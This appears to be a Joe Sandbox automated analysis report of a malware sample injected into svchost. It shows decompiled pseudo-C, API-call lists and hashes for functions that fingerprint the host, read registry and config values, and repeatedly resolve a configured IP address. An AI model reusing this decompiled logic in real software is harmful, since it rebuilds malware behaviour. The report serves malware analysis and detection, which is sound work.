                                                                                                                                  0x00000000
                                                                                                                                  0x0251e4e6
                                                                                                                                  0x0251e4e8
                                                                                                                                  0x0251e4ea
                                                                                                                                  0x0251e4ec
                                                                                                                                  0x0251e500
                                                                                                                                  0x0251e50e
                                                                                                                                  0x0251e516
                                                                                                                                  0x0251e516
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e4ea

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,0251E5F2,00000000,00020119,0251E5F2,025222F8), ref: 0251E3E6
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0251E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0251E44E
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0251E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0251E482
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0251E5F2,?,00000000,?,80000001,?), ref: 0251E4CF
                                                                                                                                  • RegCloseKey.ADVAPI32(0251E5F2,?,?,?,?,000000C8,000000E4), ref: 0251E520
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1586453840-0
                                                                                                                                  • Opcode ID: 6c3f23f8c7cc8251648d8a9067d3e7c367e96ce090e790e158b5ea57fb46a652
                                                                                                                                  • Instruction ID: fa81407bace95c2f9ea06b1855ec53aa0f34cd26e64a559883100bf2dcab1cb9
                                                                                                                                  • Opcode Fuzzy Hash: 6c3f23f8c7cc8251648d8a9067d3e7c367e96ce090e790e158b5ea57fb46a652
                                                                                                                                  • Instruction Fuzzy Hash: 104138B2D0021EBFEF11AFD8DC85DEEBBBDFB48304F454466E900A2150E3719A599B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251F26D Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1352 251f26d-251f303 setsockopt * 5
                                                                                                                                  APIs
                                                                                                                                  • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0251F2A0
                                                                                                                                  • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0251F2C0
                                                                                                                                  • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0251F2DD
                                                                                                                                  • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0251F2EC
                                                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0251F2FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: setsockopt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3981526788-0
                                                                                                                                  • Opcode ID: b12faa0a10d5bb9b766e7ccc52d7d3bb3a33765d2d4ab28012de3fbd48a65544
                                                                                                                                  • Instruction ID: 354b62f87567e847badde843e0d8419e6c1265618e793b2bf2487bc09a6e9fb6
                                                                                                                                  • Opcode Fuzzy Hash: b12faa0a10d5bb9b766e7ccc52d7d3bb3a33765d2d4ab28012de3fbd48a65544
                                                                                                                                  • Instruction Fuzzy Hash: 33110DB1A40248BAEF11DF94CD41FDE7FBDEB44751F004066BB04EA1D0E6B19A44DB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02511BDF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1353 2511bdf-2511c04 call 2511ac3 1355 2511c09-2511c0b 1353->1355 1356 2511c5a-2511c5e 1355->1356 1357 2511c0d-2511c1d GetComputerNameA 1355->1357 1358 2511c45-2511c57 GetVolumeInformationA 1357->1358 1359 2511c1f-2511c24 1357->1359 1358->1356 1359->1358 1360 2511c26-2511c3b 1359->1360 1360->1360 1361 2511c3d-2511c3f 1360->1361 1361->1358 1362 2511c41-2511c43 1361->1362 1362->1356
                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E02511BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;
				void* _t31;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;
				_t14 = E02511AC3(); // executed
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;
					}
					return _t30;
				}
				return _t14;
			}











                                                                                                                                  0x02511bec
                                                                                                                                  0x02511bf2
                                                                                                                                  0x02511bf3
                                                                                                                                  0x02511bf4
                                                                                                                                  0x02511bf5
                                                                                                                                  0x02511bf7
                                                                                                                                  0x02511bf9
                                                                                                                                  0x02511bfc
                                                                                                                                  0x02511bfd
                                                                                                                                  0x02511c04
                                                                                                                                  0x02511c0b
                                                                                                                                  0x02511c1d
                                                                                                                                  0x02511c45
                                                                                                                                  0x02511c51
                                                                                                                                  0x00000000
                                                                                                                                  0x02511c57
                                                                                                                                  0x02511c1f
                                                                                                                                  0x02511c24
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511c26
                                                                                                                                  0x02511c26
                                                                                                                                  0x02511c35
                                                                                                                                  0x02511c37
                                                                                                                                  0x02511c38
                                                                                                                                  0x02511c3f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511c41
                                                                                                                                  0x02511c5e

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 02511AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 02511AD4
                                                                                                                                    • Part of subcall function 02511AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 02511AE9
                                                                                                                                    • Part of subcall function 02511AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 02511B20
                                                                                                                                  • GetComputerNameA.KERNEL32(?,0000000F), ref: 02511C15
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 02511C51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                                                                  • String ID: hi_id$localcfg
                                                                                                                                  • API String ID: 2794401326-2393279970
                                                                                                                                  • Opcode ID: ba937735d8c1c5a2ab0c1c9000c9a28296b70a29376112fc1b69a7feb43f4fef
                                                                                                                                  • Instruction ID: c43176cf9829ef1d5a8a083d6fb3287e4ab78ee1a473db3bd565c5650a306e0c
                                                                                                                                  • Opcode Fuzzy Hash: ba937735d8c1c5a2ab0c1c9000c9a28296b70a29376112fc1b69a7feb43f4fef
                                                                                                                                  • Instruction Fuzzy Hash: 70018472A04518BBFB50DEE8C8C49EFBABCB744649F1048B5D706E3540D2309E4496A4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251EC54 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251EC54() {
				long _v8;
				struct _FILETIME _v16;
				signed int _t11;

				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
				 *0x25236cc = _t11;
				return _t11;
			}






                                                                                                                                  0x0251ec5e
                                                                                                                                  0x0251ec72
                                                                                                                                  0x0251ec84
                                                                                                                                  0x0251ec89
                                                                                                                                  0x0251ec8f

                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0251EC5E
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0251EC72
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251EC78
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountFileInformationSystemTickVolume
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1209300637-3142137124
                                                                                                                                  • Opcode ID: 361771b50e6a115201e548eadc37cb114fcdd49dc0a746fad5cdcd3300b497ef
                                                                                                                                  • Instruction ID: b9d54153658150fd1f47d60fd274f7f235b08830170eb0a14b1e93fb6b470e8e
                                                                                                                                  • Opcode Fuzzy Hash: 361771b50e6a115201e548eadc37cb114fcdd49dc0a746fad5cdcd3300b497ef
                                                                                                                                  • Instruction Fuzzy Hash: 84E075B5850208BFEB11AFB0DC4AE7B77ACEB19214B910A50B911D60D0DA74AA189A68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02511B71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                  			E02511B71() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;
				_t12 = E02511AC3(); // executed
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0251ECA5() & 0x7fffffff;
				}
				return _t28;
			}









                                                                                                                                  0x02511b7e
                                                                                                                                  0x02511b84
                                                                                                                                  0x02511b85
                                                                                                                                  0x02511b86
                                                                                                                                  0x02511b87
                                                                                                                                  0x02511b89
                                                                                                                                  0x02511b8c
                                                                                                                                  0x02511b8d
                                                                                                                                  0x02511b94
                                                                                                                                  0x02511ba3
                                                                                                                                  0x02511bb8
                                                                                                                                  0x02511bc8
                                                                                                                                  0x02511bca
                                                                                                                                  0x02511bcd
                                                                                                                                  0x00000000
                                                                                                                                  0x02511bd8
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 02511AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 02511AD4
                                                                                                                                    • Part of subcall function 02511AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 02511AE9
                                                                                                                                    • Part of subcall function 02511AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 02511B20
                                                                                                                                  • GetComputerNameA.KERNEL32(?,0000000F), ref: 02511BA3
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,02511EFD,00000000,00000000,00000000,00000000), ref: 02511BB8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 2794401326-1857712256
                                                                                                                                  • Opcode ID: 28cc90a146fe8cf621ebec03ddb5496770bf1e0f6fdd03463a80c800df6c1059
                                                                                                                                  • Instruction ID: 3bf6c26c0b2da292db294c23cc75dfe120f52bf41dd320635d6ecb8aa401ca41
                                                                                                                                  • Opcode Fuzzy Hash: 28cc90a146fe8cf621ebec03ddb5496770bf1e0f6fdd03463a80c800df6c1059
                                                                                                                                  • Instruction Fuzzy Hash: D6018BB6D01108BFEB009AE9C8819EFFABDAB98654F150462AB01E3180D6705E088AA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02512684 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • inet_addr.WS2_32(00000001), ref: 02512693
                                                                                                                                  • gethostbyname.WS2_32(00000001), ref: 0251269F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbynameinet_addr
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 1594361348-2401304539
                                                                                                                                  • Opcode ID: 7c2322f5a4c0d7ee7c0cb33db66f00e373103db113ed403d2587809140ec5a57
                                                                                                                                  • Instruction ID: 68089f909d7759265c42ad08bcc6e9f8a053564d5e616832df8788d236696ff2
                                                                                                                                  • Opcode Fuzzy Hash: 7c2322f5a4c0d7ee7c0cb33db66f00e373103db113ed403d2587809140ec5a57
                                                                                                                                  • Instruction Fuzzy Hash: 56E0EC306155219FEB609E28F844A957BA5AF46230F064585F854D71D0DB30DC859698
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251E52E Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E0251E52E(void* __edx, void* __eflags) {
				long _v4;
				void* __ecx;
				void* _t9;
				void* _t11;
				void* _t17;
				long _t20;
				void* _t23;
				int _t24;
				void* _t25;
				void* _t28;
				void* _t32;
				void* _t37;
				void* _t40;
				void* _t44;

				_t44 = __eflags;
				_t32 = __edx;
				E0251DD05();
				_t28 = E0251DBCF(_t44, 0x80000000, 3);
				_pop(_t31);
				if(_t28 == 0xffffffff) {
					L6:
					_t9 = E02512544(0x25228f8, 0x25210d0, 7, 0xe4, 0xc8);
					_t11 = E0251E3CA(_t32, 0x80000001, E02512544(0x25222f8, 0x25210bc, 0x14, 0xe4, 0xc8), _t9); // executed
					_t40 = _t37 + 0x34;
					if(_t11 == 0) {
						_t17 = E02512544(0x25228f8, 0x25210d0, 7, 0xe4, 0xc8);
						E0251E3CA(_t32, 0x80000001, E02512544(0x25222f8, 0x25210a0, 0x19, 0xe4, 0xc8), _t17); // executed
						_t40 = _t40 + 0x34;
					}
					E0251EE2A(_t31, 0x25222f8, 0, 0x100);
					E0251EE2A(_t31, 0x25228f8, 0, 0x100);
					E0251DD69();
					return 1;
				}
				_t20 = GetFileSize(_t28, 0);
				_v4 = _t20;
				if(_t20 != 0) {
					E0251DB2E(_t20);
					_t23 =  *0x25236c4; // 0x0
					_pop(_t31);
					if(_t23 != 0) {
						_t31 =  &_v4;
						_t24 = ReadFile(_t28, _t23, _v4,  &_v4, 0);
						_t48 = _t24;
						if(_t24 != 0) {
							_t25 =  *0x25236c4; // 0x0
							E02512544(_t25, _t25, _v4, 0xe4, 0xc8);
							E0251E332(_t32, _t48,  *0x25236c4, _v4);
							_t37 = _t37 + 0x1c;
						}
					}
				}
				CloseHandle(_t28);
				goto L6;
			}

















                                                                                                                                  0x0251e52e
                                                                                                                                  0x0251e52e
                                                                                                                                  0x0251e533
                                                                                                                                  0x0251e544
                                                                                                                                  0x0251e54c
                                                                                                                                  0x0251e553
                                                                                                                                  0x0251e5b8
                                                                                                                                  0x0251e5c7
                                                                                                                                  0x0251e5ed
                                                                                                                                  0x0251e5f2
                                                                                                                                  0x0251e5f7
                                                                                                                                  0x0251e603
                                                                                                                                  0x0251e624
                                                                                                                                  0x0251e629
                                                                                                                                  0x0251e629
                                                                                                                                  0x0251e635
                                                                                                                                  0x0251e63e
                                                                                                                                  0x0251e646
                                                                                                                                  0x0251e653
                                                                                                                                  0x0251e653
                                                                                                                                  0x0251e558
                                                                                                                                  0x0251e55e
                                                                                                                                  0x0251e564
                                                                                                                                  0x0251e567
                                                                                                                                  0x0251e56c
                                                                                                                                  0x0251e571
                                                                                                                                  0x0251e574
                                                                                                                                  0x0251e578
                                                                                                                                  0x0251e583
                                                                                                                                  0x0251e589
                                                                                                                                  0x0251e58b
                                                                                                                                  0x0251e58d
                                                                                                                                  0x0251e59a
                                                                                                                                  0x0251e5a9
                                                                                                                                  0x0251e5ae
                                                                                                                                  0x0251e5ae
                                                                                                                                  0x0251e58b
                                                                                                                                  0x0251e574
                                                                                                                                  0x0251e5b2
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0251DD05: GetTickCount.KERNEL32 ref: 0251DD0F
                                                                                                                                    • Part of subcall function 0251DD05: InterlockedExchange.KERNEL32(025236B4,00000001), ref: 0251DD44
                                                                                                                                    • Part of subcall function 0251DD05: GetCurrentThreadId.KERNEL32 ref: 0251DD53
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,761B43E0,?,00000000,?,0251A445), ref: 0251E558
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,761B43E0,?,00000000,?,0251A445), ref: 0251E583
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,761B43E0,?,00000000,?,0251A445), ref: 0251E5B2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3683885500-0
                                                                                                                                  • Opcode ID: 9e9c6146b896f09cb0532727ce2ff2649b483eca6d44c5cee48661d9f3795e13
                                                                                                                                  • Instruction ID: 77034e418546a4fa221fc236f5dc1a3685117705e15a06e44c790b4e4e1c4687
                                                                                                                                  • Opcode Fuzzy Hash: 9e9c6146b896f09cb0532727ce2ff2649b483eca6d44c5cee48661d9f3795e13
                                                                                                                                  • Instruction Fuzzy Hash: 28214EB2A803123BF2203A21DC46F6B3E5DFB96750F110814BE0AB51D3F651EC1889BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251877E Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 100sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E0251877E() {
				char _v256;
				void* _t16;
				char _t33;
				char* _t36;
				char _t45;
				char _t47;
				void* _t52;
				void* _t53;

				_t52 =  &_v256;
				if(( *0x2522f18 & 0x00000001) == 0) {
					 *0x2522f18 =  *0x2522f18 | 0x00000001;
					 *0x2522f14 = E0251F04E(0);
				}
				if(( *0x2522f18 & 0x00000002) == 0) {
					 *0x2522f18 =  *0x2522f18 | 0x00000002;
					 *0x2522f10 = E0251F04E(0);
				}
				_t51 = "ip";
				_t49 = "localcfg";
				_t47 = E0251E819(1, "localcfg", "ip", 0);
				_t53 = _t52 + 0x10;
				if(_t47 != 0 && E025126B2(_t47,  &_v256) != 0) {
					E0251E8A1(_t45, 1, _t49, "rresolv",  &_v256);
					_t53 = _t53 + 0x10;
				}
				L7:
				E02518CEE();
				E0251C4D6();
				E0251C4E2();
				_push(0x2522118);
				E02512011();
				if(E0251F04E(0) -  *0x2522f14 > 0x1e) {
					_t33 = E0251E819(1, _t49, _t51, _t47);
					_t53 = _t53 + 0x10;
					if(_t47 != _t33) {
						if(E025126B2(_t33,  &_v256) != 0) {
							E0251E8A1(_t45, 1, _t49, "rresolv",  &_v256);
							_t53 = _t53 + 0x10;
						}
						_t47 = _t33;
					}
					 *0x2522f14 = E0251F04E(0);
				}
				_t16 = E0251F04E(0);
				_pop(_t36);
				if(_t16 -  *0x2522f10 >= 0xa) {
					E02518328(_t36, _t45); // executed
					 *0x2522f10 = E0251F04E(0);
				}
				Sleep(0x3e8); // executed
				goto L7;
			}











                                                                                                                                  0x0251877e
                                                                                                                                  0x0251878f
                                                                                                                                  0x02518791
                                                                                                                                  0x025187a0
                                                                                                                                  0x025187a0
                                                                                                                                  0x025187ac
                                                                                                                                  0x025187ae
                                                                                                                                  0x025187bd
                                                                                                                                  0x025187bd
                                                                                                                                  0x025187c4
                                                                                                                                  0x025187ca
                                                                                                                                  0x025187d7
                                                                                                                                  0x025187d9
                                                                                                                                  0x025187de
                                                                                                                                  0x025187fe
                                                                                                                                  0x02518803
                                                                                                                                  0x02518803
                                                                                                                                  0x02518806
                                                                                                                                  0x02518806
                                                                                                                                  0x0251880b
                                                                                                                                  0x02518810
                                                                                                                                  0x02518815
                                                                                                                                  0x0251881a
                                                                                                                                  0x02518831
                                                                                                                                  0x0251883d
                                                                                                                                  0x0251883f
                                                                                                                                  0x02518844
                                                                                                                                  0x02518855
                                                                                                                                  0x02518864
                                                                                                                                  0x02518869
                                                                                                                                  0x02518869
                                                                                                                                  0x0251886c
                                                                                                                                  0x0251886c
                                                                                                                                  0x02518876
                                                                                                                                  0x02518876
                                                                                                                                  0x0251887d
                                                                                                                                  0x02518888
                                                                                                                                  0x0251888c
                                                                                                                                  0x0251888e
                                                                                                                                  0x0251889b
                                                                                                                                  0x0251889b
                                                                                                                                  0x025188a5
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 025188A5
                                                                                                                                    • Part of subcall function 0251F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0251E342,00000000,745CF210,80000001,00000000,0251E513,?,00000000,00000000,?,000000E4), ref: 0251F089
                                                                                                                                    • Part of subcall function 0251F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0251E342,00000000,745CF210,80000001,00000000,0251E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0251F093
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileSystem$Sleep
                                                                                                                                  • String ID: localcfg$rresolv
                                                                                                                                  • API String ID: 1561729337-486471987
                                                                                                                                  • Opcode ID: 1da587d4006bfb0b80a1ce69e64f2f4f4a81403fc6f5157b450afb9216710e2b
                                                                                                                                  • Instruction ID: 470f19c0db1982b8694dcfcaae4de7313db9651a670f6ae4f79ab2e04f8b3e72
                                                                                                                                  • Opcode Fuzzy Hash: 1da587d4006bfb0b80a1ce69e64f2f4f4a81403fc6f5157b450afb9216710e2b
                                                                                                                                  • Instruction Fuzzy Hash: 65219A315883027AF334FB65EC47F7A3AD9BB96724F550819FD04D50C0DB9149488DAD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02514000 Relevance: 4.5, APIs: 3, Instructions: 35sleepfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02514000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}







                                                                                                                                  0x02514001
                                                                                                                                  0x02514006
                                                                                                                                  0x02514008
                                                                                                                                  0x0251400b
                                                                                                                                  0x02514021
                                                                                                                                  0x0251402a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251402c
                                                                                                                                  0x02514035
                                                                                                                                  0x02514052
                                                                                                                                  0x00000000
                                                                                                                                  0x0251403c
                                                                                                                                  0x0251403f
                                                                                                                                  0x02514059
                                                                                                                                  0x00000000
                                                                                                                                  0x0251405b
                                                                                                                                  0x02514046
                                                                                                                                  0x0251404c
                                                                                                                                  0x02514050
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02514050
                                                                                                                                  0x02514035
                                                                                                                                  0x02514057
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNEL32(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,025222F8,025142B6,00000000,00000001,025222F8,00000000,?,025198FD), ref: 02514021
                                                                                                                                  • GetLastError.KERNEL32(?,025198FD,00000001,00000100,025222F8,0251A3C7), ref: 0251402C
                                                                                                                                  • Sleep.KERNEL32(000001F4,?,025198FD,00000001,00000100,025222F8,0251A3C7), ref: 02514046
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorFileLastSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 408151869-0
                                                                                                                                  • Opcode ID: b96c0f07e2834c3fe21796d6e407cc724ccd5d68ef97ef627b8a538cf48f8dc1
                                                                                                                                  • Instruction ID: 44146ca40e746503dad8084906bcff9d6c84f6e954d0914de688f3ffdc04a9ed
                                                                                                                                  • Opcode Fuzzy Hash: b96c0f07e2834c3fe21796d6e407cc724ccd5d68ef97ef627b8a538cf48f8dc1
                                                                                                                                  • Instruction Fuzzy Hash: A1F08232640141AAF7350F25AC49B3A36A1FB82724F665A24F3B5EE0D0C73044899A1C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251DB67 Relevance: 4.5, APIs: 3, Instructions: 32filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251DB67(long _a4, long _a8, CHAR* _a12, CHAR* _a16) {
				char _v264;
				signed int _t13;
				void* _t17;
				CHAR* _t18;
				void* _t19;

				_t13 = GetEnvironmentVariableA(_a12,  &_v264, 0x104);
				if(_t13 == 0) {
					return _t13 | 0xffffffff;
				} else {
					_t18 = _t19 + _t13 - 0x104;
					if( *((char*)(_t18 - 1)) == 0x5c) {
						_t18 = _t19 + _t13 - 0x105;
						 *_t18 = 0;
					}
					lstrcpyA(_t18, _a16);
					_t17 = CreateFileA( &_v264, _a4, 1, 0, _a8, 0x80, 0); // executed
					return _t17;
				}
			}








                                                                                                                                  0x0251db7f
                                                                                                                                  0x0251db87
